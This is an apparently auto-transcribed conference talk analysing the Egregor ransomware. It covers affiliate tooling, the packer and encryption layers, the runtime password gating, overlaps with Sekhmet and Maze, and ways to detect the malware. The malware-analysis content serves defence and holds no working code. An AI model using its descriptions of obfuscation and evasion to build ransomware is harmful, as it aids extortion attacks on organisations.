Egregor Awakens: Taking A Tour Of A Threat Actor’s New Digs by Lindsay Kaye

hi everyone my name is lindsey k and today i'm going to talk to you a little bit about a gregor awakens taking a tour of threat actors new digs so a bit about me um just as was mentioned i'm by trade and malware analyst and reverse engineer and i particularly really like taking apart weird cryptography during my analysis so i'll talk a little bit about that in this talk um and currently i run instinct group's technical team at recorded future insect group is the threat intelligence team for the company so today we're going to start with some background on a gregor then we're going to do a technical deep dive talk about some technical overlaps with

other threat actors and then finally finish up with ways to track a gregor so for those of you who aren't familiar with mcgregor they began operating in september 2020 and they're considered a variant of the sekhmet family so around the same time in september 2020 maze another ransomware family stopped encrypting new victims so at the time that maze went down mcgregor started coming up and it's suspected that many affiliates of the maze ransomware variant have likely moved to the mcgregor ransomware as a service group like many big game ransomware hunting uh groups they do the name and shame of victims on their extortion state of gregor news and you can see an example of one of

these name and shame instances on a gregor news in the image on the right so in mid-february members of the gregor ransomware's service were actually arrested in the ukraine and at the time so since about 2 12 21 we saw their infrastructure so their c2s and that leak site have been down so since then they've stopped encrypting new victims and they don't appear to rebuild their infrastructure suggesting that they are no longer active so for those of you who aren't familiar with what ransomware as a service is i'll give you a brief explanation so the concept of ransomware service starts with a ransomware developer who creates ransomware code so this individual is technical enough to write the code

create it package it up and then make it something that could you know actually be effective on a victim system and then another group of individuals called affiliates can either buy or release this malware to execute their own attacks so these individuals really don't have to be technical or capable of writing their own ransomware but they have to have some sort of appetite and desire to conduct ransomware attacks themselves so the developer if these affiliates are successful in getting a ransom from an organization um we'll usually get some cut of that ransom so that's how the business model works and because mcgregor uses that ransomware as a service model um you'll notice and we'll talk a little

bit about this the ttps observed in the attacks will vary so all these different affiliates will bring different techniques around initial access so how they initially get on the victim system um some of the pre-encryption things that they'll use so for lateral movement so it's how do they move around the victim's network um get to other parts of it you know really they want to create maximum impact so making sure you could encrypt as much as possible is key i'm reconnaissance still collecting information about the victim the organization other information that might be valuable to them in again increasing the impact of their attack and then doing some sort of credential stealing so enabling further access or

more extensive access but really this can extend to tools used in any stage of the attack so sometimes you'll see between the initial access and the dropping the ransomware additional tools will be dropped based on the desire of the affiliate um the needs of the attack what the organization's security looks like and really what they're trying to accomplish so it's also worth noting that some affiliates either may be or have been involved with other ransomware groups so they might not just be working for this one ransomware as a service group but they might be working for others as well and it's key to know that while some ransomwares and service groups are free for whoever to join if they'd like some are

very exclusive and invite only so to give you an idea of exactly how prolific mcgregor was while it was active by the end of 2020 they had claimed 206 victims so this included many large well-known organizations that i'm sure you've heard of um and to give you an idea of kind of how this distributed if you look at this graph of ransomware attacks by family so through november 2020 you'll see that maze represents about 26 percent of the attacks but keep in mind at this time maze had been active for the better part of about nine months um and if you look at a gregor at this point they'd only been active for about two and represented about

13 so they kind of spun up very quickly and then really got to um their whole encrypting and victimizing organizations so in order to understand how a gregor ransomware attacks unfold in the tools that they use i've divided the attack into four kind of main stages so initial access like we talked about so how the threat actor gains access to the organizational system then lateral movement and reconnaissance so this is that kind of dwell time so dwell time could last anywhere between you know a couple hours or up to you know days or weeks so it really does vary based on the affiliate involved and different groups and really what their needs are so um i wasn't able to find

any statistics on the average dwell time for a mcgregor attack but i would suggest that it might not be very meaningful given the fact that there are so many different affiliates involved and it very likely depends on which affiliate is doing what and what the needs of their attack are so moving on to data exfiltration because as you can imagine extortion is more effective when you have something to extort the organization with so this will be where the threat actor will exfiltrate this victim's data so that they can post on their league site and then attempt to use it to have the threat actor or have the organization provide them with money so that they take down and don't leak it

and then finally the dropping of the ransomware which i'm sure is the kind of most familiar part to all of us of a ransomware attack and obviously the one that kind of creates the most um notice because now your victim system is suddenly encrypted so to look at some of the tools that are used by in association with the gregor attacks at each stage uh let's start with initial access so here um what we observed is that primarily three fairly common um techniques used among you know phishing is used among apts as well as a lot of other rants a big game ransomware hunting as well really everybody does use phishing um and then rdp exploits and vpn

exploits so we've seen those different kinds of techniques used with many other big game ransomware hunting so really nothing super aggressor specific or distinctive there but again these are effective and fairly popular among threat actors moving into the lateral movement reconnaissance stage i'm sure you see a bunch of tools that you're super familiar with um so cobalt strike right everybody uses cobalt strike that's a little bit facetious but many actors within the apt space as well as big game ransomware hunting it is an openly available tool that you can purchase on the internet um similar to kind of the idea of quakebot or sniffing ice id popular banking trojans that we see used and i'd find an

advanced ip scanner so again we're not really seeing anything highly specific or distinctive to the actual gregor ransomware family but really just kind of a lot of commodity openly available popular um you know malicious behavior type tools here to enable this stage of the attack and then moving into data exfiltration um you're probably familiar with our clone and 7-zip for their benign use cases and this is probably where you start to get pause so arguably the extortion part of the attack is one of the most impactful for an organization because this is the hardest thing to really mitigate right so you may be able to kind of detect tools in the lateral movement stage and

you know have anti-ransomware and anti-phishing protections kind of present but the exfiltration of the data and the extortion is something that is incredibly impactful and also as you can see somewhat hard to detect so having to decide whether the presence of 7-zip on a system is being used for malicious or benign purposes is fairly complex and we'll talk more about that later and then finally the dropping of the malware which is really where we see that first gregor specific um tool that is dropped so a gregor ransomware which we'll dive into and i thought this was fairly interesting um so in one of their attacks agregar actually um print bombed their ransom note to all the printers of that organization

and so you can see here a picture of a receipt printer at the organization printing out copies of their ransom note which i thought was particularly interesting um and kind of snarky [Music] so looking at the gregor ransomware payload there's really three layers to this payload malware so first the stage one packer i saw obfuscated on obfuscated versions a stage 2 packer and the aggregator payload itself so in order to successfully execute this payload you need to provide the correct cryptographic key at runtime so no key no execution and the payload accepts several different command line arguments to determine its functionality and behavior um we'll talk a little bit about that soon so starting with that stage one packer

as i mentioned i saw two different versions so an obfuscated and an unobfuscated version and to the right you can see the unobfuscated version mostly just because it's a lot easier to see kind of what's going on there um and really talk about its functionality so to me this suggests it's probably some sort of compile-time obfuscation utility because the obfuscated and obfuscated ones were semantically so similar so it's probably not something that um the threat actor wrote completely different code to accomplish but probably a compile time it post-processed and made it look obfuscated so let's talk about this so you can see the baked in cryptographic key material so it uses a choctaw cipher so

as you can see the key expanding keynotes add that is the cryptographic key material so because the key material is provided there's really nothing that will prevent the execution of this stage and the unpacking and decryption of the next stage so really what it's doing is functioning to obfuscate what is contained within this binary so fairly common for packers to do um overall all of them were very similar with some very slight differences so first the command line parameter that was passed so here it's dash dash no operation saw a whole variety of others not really super meaningful to the functionality of the stage 1 packer the xor value that was used in the base64 decode and xor function

to kind of decode that basicsu4 key generally i saw three or four used as the extra key but it can vary and then finally the crypto key and initialization vector that were used in those key functions um again not really impactful because ultimately all the key material is provided so we're off to the races so another interesting thing about the stage one packer is that some of them actually had baked in pdb paths that were really fairly similar to each other so i saw a lot of things that sort of m ewtk and m schustp and if you look at the big chart on the right um it's the approximate count of how many instances of each pdb path i saw in

the collection of samples i had so this could suggest that there are multiple individuals that are compiling the code um with some of them being more active than others but this also could just be kind of the distribution of samples that i was able to acquire um but ultimately pdb is fairly easy to modify per build um so while these patterns are super interesting noting that it's not necessarily deterministic of you know if this pdb path is the same between two samples it's absolutely the same individual um but it is worth noting so sometimes you'll see other threat actors you know maze in particular will use the pdb path to make snarky comments or you know rude jokes against

other security researchers so i just wanted to highlight this for our discussion so moving on to that stage two package so here's where things start to get interesting so pretty much how this works is there's a function that first reads the command line and is looking for that password that we talked about after the dash p so it has to be passed at runtime and this password is then passed to a rabbit decryption function so if you're not familiar with the rabbit description cipher um you're not alone gen this is fairly uncommon to see used in ransomware and generally i'll see you know crypto algorithms like rc4 des triple des aes um so route was fairly uncommon

to be observed here but that's what they use and after the decryption takes place um the next function looks for an mz header so whether or not it has decrypted a valid pe file so has successfully decrypted the actual ransomware payload and if it does it runs it so here as you can imagine if you do not pass the correct cryptographic key you will not successfully decrypt it and then it will be game over so for samples that you do not have the right cryptographic key for this is where they stop executing and no ransom uh no ransomware is deployed and nothing else takes place so if you actually succeed in decrypting the aggregator payload

this is what you get um fairly typical ransomware behaviors um doesn't really stick out as particularly novel in terms of what it does so it'll do the language checks for the commonwealth of independent states countries so fairly common to be doing and if it finds that the computer is associated with one of those languages it will stop executing it will delete the shadow copies using wmi this is also another pretty common thing to do to really make recovery more difficult for the victim stopping processes and services that again aid in recovery or backup of the system and then finally because it is ransomware it does encrypt the files on the system except for specific file extensions and

folders predominantly that would enable the computer to function so executables dlls things like that because as you can imagine if you encrypt all of those the computer no longer functions even if the person does pay the ransom then it's going to be very hard to decrypt their stuff because the computer no longer functions so you can see an example of what the ransom note looks like that is dropped so we saw an example of that being printed on a receipt printer but here's a slightly bigger example for you to look at here so as i mentioned mcgregor and sekhmet are fairly related and it borrows very heavily from the sekhmet code so they have very similar processes

terminated like i talked about to make recovery more difficult for the victim the extensions and file names that they avoid encrypting again like i talked about um the name of the ransom note file itself they both use recover files.txt the way that they rename encrypted files so they append an extension to the end of the file to show it's encrypted and the victim notices something is wrong the string encryption method as well like i said i love talking about weird encryption so you can see the pseudo code for the string encryption on the bottom right that i put together so this is a fairly simple i would say xor cipher xor base type ciphers are fairly common

um as in you know obfuscation mechanisms used by different ransomware groups and other apts but this is not a specific one that i had seen before and they are absolutely identical between a gregor and sekhmet suggesting that there is some sort of relation um though anybody could really probably you know incorporate this into their ransomware themselves if they felt like it or other pieces of code but this is exactly how they do the string decryption i thought it was cool additionally the method of code obfuscation that is used so mcgregor is not a very straightforward payload and they obfuscate the code specifically the control flow so if you look at the top two images on the slide

that gives you some idea of some of the techniques that they use and try to remember this for our next slide or shortly so the jump if zero and jump if not zero fairly common makes it harder for reverse engineer to understand the control flow and does do some to confuse the tools that we use um finally they had a highly similar first stage packer so remember that packer we talked about with the baked in key material that uses the cha-cha cipher i saw very similar first stage packers used in both so there are a few key differences between a gregor and segment though so the first one is that a gregor does contain code for an http http post network

request but it doesn't appear to be triggered at any point um in sekhmet this code is used and actually does the post um but it's worth noting because maybe this is kind of a sigil code that has been left over that the developers did not take out worth noting and also sekhmet only has two stages so remember aggregator has three and does not require a password so gregor so sekhmet has that first stage packer that we said was very similar and the sec met ransomware but what it's missing is that middle stage with the rabbit decryption that takes in the password and tries to decrypt the payload so again no password is required and if you

double click on some segment you will in fact get ransomed so aggregate requires password segment does not additionally a gregor adds a couple different command line parameters so dash dash samba so that means link files will not have a delete on close attribute and dash dash kill rdp which is self-explanatory um finally the file names of the dropped files as part of the ransomware attack differ so a gregor uses dtb.dat and segment uses sysconfig.db so i hear a lot of people talk about similarities between maze and mcgregor and we kind of alluded to that in the beginning but um i wanted to highlight a couple of the difference that i saw at the technical level in the code

itself so first um they use substantially different obfuscation techniques so for example maze does import obfuscation so it makes it harder to tell which functions are imported to be used in the binary using um this import hashing technique that i show at the top or right in that image um mcgregor doesn't do any sort of import hashing so there's kind of one key difference and maze doesn't appear to obfuscate their strings in any way while mcgregor does so kind of two key different approaches to obfuscation uh worth highlighting as well additionally the packers and first stages are very different so like i mentioned there is a fairly consistent group of like that one first stage packer used

with a gregor but there's a huge variety with maze so maze also has an affiliate program and this is likely an artifact of that so different affiliates will join the program and likely bring tools techniques different sort of capabilities with them from you know previous gigs or just because that's what they have so either things they write themselves to pack it or packers that are commodity that they purchase or acquire in some way so that's probably the reason for so much variety with maze versus that one that we really saw with the gregor and then there were different code obfuscation techniques so as we saw with the aggregator they did one kind of code obfuscation

mesa's code obfuscation was i would say significantly more extensive and there are many different techniques used so i'm not going to go into these in a lot of detail but you can see them in the two images on the right so some researchers have done a really great breakdown of these techniques and really explained kind of what is going on here so that's definitely worth checking out if you want but there was a pretty similar looking country check so we talked about the commonwealth of independence state's country check um and you can see in the bottom left the mcgregor country language check and base language check look very familiar so i wouldn't consider this a smoking

gun but in order to do this discussion justice i am pointing it out so yes lindsay that is just code what else yes the diamond model does not go away so we can't just look at things from the technical perspective here and we have to think about um these ransomware attacks in relation to the victims the adversaries and infrastructure that is involved and let's talk about why that is so ransomware affiliates are moving to new variants operations are spinning up and spinning down over the course of the year um we talked a lot about the commodity tools that have been used and so this really starts to blur from a technical perspective the obvious hallmarks hallmarks of

specific threat actors or variants um so here's kind of why that is so as chain analysis points out they believe that the blockchain analysis so a lot of the cryptocurrency things that are involved suggest that there's affiliate overlap and other possible connections between maze mcgregor suncrypt and doppelgamer so for i guess very well known ransomware groups um cobalt strike which we've talked about was actually used in 70 of the big game hunting incidents in 2020 so you remember that large pie chart of all the different threat actors that were using or doing ransomware attacks in 2020 70 of the big game ones actually used this one tool so it's not a very distinctive indicator of any one group in particular

just kind of bad behavior um rdp is the most common attack vector employed to install ransomware which are gregar used and then vpn vulnerabilities really aren't far behind and then like i said before everyone uses phishing so really what we're looking at from the technical perspective is a lot of harm hallmarks of you know threat actors and malware and at a broad technical level but we're really not seeing anything very um ransomware family specific until we get to that actual malware so that's why context remains super important so what does this mean for us as defenders so there is some good news um because many of these same gtps are used between ransomware threat actors

so this really helps us focus our detections and mitigations on some of these common issues and common tools so different vulnerabilities different vulnerable uh products you know really being aware of what these are so that we can start to protect them um in its advisory on mcgregor ransomware fbi advised patching several rdp vulnerabilities from 2019 and 2020 and you know while these were in association with mcgregor there's you know no reason that maybe other fret actors aren't using them now which they might be and may not use them in the future so potentially even though gregor doesn't seem to be very active anymore by protecting against these vulnerabilities we may be heading off some other avenues that other big game

hunting ransomware threat actors will be using but there's also bad news so they're still using these ttps because they're succeeding with them fishing will always be a problem while you have people they will click on things and the lures are only getting more creative more stealthy and more interesting to potential victims so additionally as we all know patching takes resources and may fall by the wayside as your resources are you know handling whatever is kind of top of mind or super critical right now and you may not even be able to patch all of the potential vulnerabilities that exist for all the ransomware threats and other kinds of threats that you're afraid of and then finally separating the good

versus bad use of tools is difficult so we talked about the presence of 7-zip being used for data exfiltration so for an organization to decide whether the presence of 7-zip on their system is good or bad it's doable it's not insurmountable but it is very difficult especially given the size of many organizations and the diversity of tools and the difficulty to truly base on and understand what a malicious use of 7-zip really looks like and detect it and then thwart it and the worst news of all is that if they need to they will evolve their ttps so as i'm sure you're aware there is big game money there's big money in big game hunting

and while it is still profitable profitable people will still do it and remember those affiliates they're moving between programs they're learning new skills bringing new tools so while you may be aware of what they're using now keep in mind that as new affiliates join and move around these techniques will evolve over time and then we'll start to see kind of a lot more diversity associated with any specific type of threat actor so if you're interested in tracking aggregate there's kind of a couple approaches we could take so first monitoring for unexpected commodity and openly available tools like they use so specifically quakebot and cobalt strike so again these aren't a gregor specific but they are commonly used with

ransomware deployments as i've mentioned and generally they're precursor to many kinds of unsavory behavior so again kind of more bang for your buck detecting those and recorded futures actually created summer rules and yara rules for some of these tools um but if you want to track aggregators specifically a couple things that you can look at so that second stage with the rabbit decryption is actually extremely consistent between the samples so even at the bite level um the string decryption technique using the final payload that used between both greger and sekhmet was a fairly consistent kind of indicator mcgregor as i mentioned it hadn't really seen it anywhere else and then finally that first stage decryption process

with the xor cha-cha cipher check for the valid pe file and then sleep if fail was also something that could be tracked in association with the gregor itself so what's next where are we so now that the affiliates have been arrested uh a gregor operation is pretty likely dead um it's pretty likely that the the operators themselves will move to a new operation um and it is possible to see some of the ttps used so again those commodity tools but maybe also aspects of the actual code itself or different techniques that they developed that they found particularly successful can carry over to their new operation um also worth noting ransomware isn't going away anytime soon

so like i said big game hunting is big business and while it is profitable they will keep doing it um name and shame has proven fairly profitable and successful for threat actors and it will likely remain popular and then cartels in which threat actors team up and then share different resources so things like leak site and infrastructure will also probably remain popular as well as we move forward so with that thank you so much i'm lindsay k thank you for attending my talk sammy have any questions we actually do lindsey and thanks very much for the talk first of all and we have a couple of minutes for questions so and we have a question here um how common is

the cs exclusion across different ransomwares the cis exclusion so generally it will be in any sort of ransomware that is created by threat actors who are very likely in you know eastern european countries where executing this kind of attack on other on computers that are in that kind of group of countries would be very very bad um you'll see a lot of that there so like i said maze does it um i believe a couple other of the big game hunting ransomware families do it um i saw sample the other day i believe it was dear cry that doesn't um so i would say that a lot of the more famous names of ransomware that are created in probably

eastern europe are more likely to have it um versus not and those are a lot of like the really sophisticated ones that we hear a lot about brilliant thank you and one more thing so gregory is pretty much dead as you said um it's on his way out but um those criminals are going to move on to new operations potentially use the same ttp so what would be your advice on um mitigating or protecting against the threat of a gregor or the next thing that comes after a greg are using the same ttvs sure so like i said there are a couple ways of getting sort of more bang for your buck for detection so the best time to detect a ransomware

attack is as early as possible so at that fishing stage um but really looking at that kind of dwell time stage so the use of things like cobalt strike a lot of the really popular banking bots and trojans as i mentioned um frequently used so as i mentioned those are generally precursors to you know all kinds of unsavory behavior so really kind of understanding what are those common ttps among the big game threat actors um so you'll see a lot of malicious use of those tools but then you'll also see malicious use of a lot of you know living off the land type techniques so windows tools themselves so really trying to understand like what

are the tools and techniques that a lot of thread actors use because they remain successful and then looking to protect against and mitigate those and then also monitor for their use that's brilliant thank you very much and that brings us to the end of this talk lindsay thank you very much the the feedback on the chat is is great people love the talk so thank you again for being with us today thank you so much you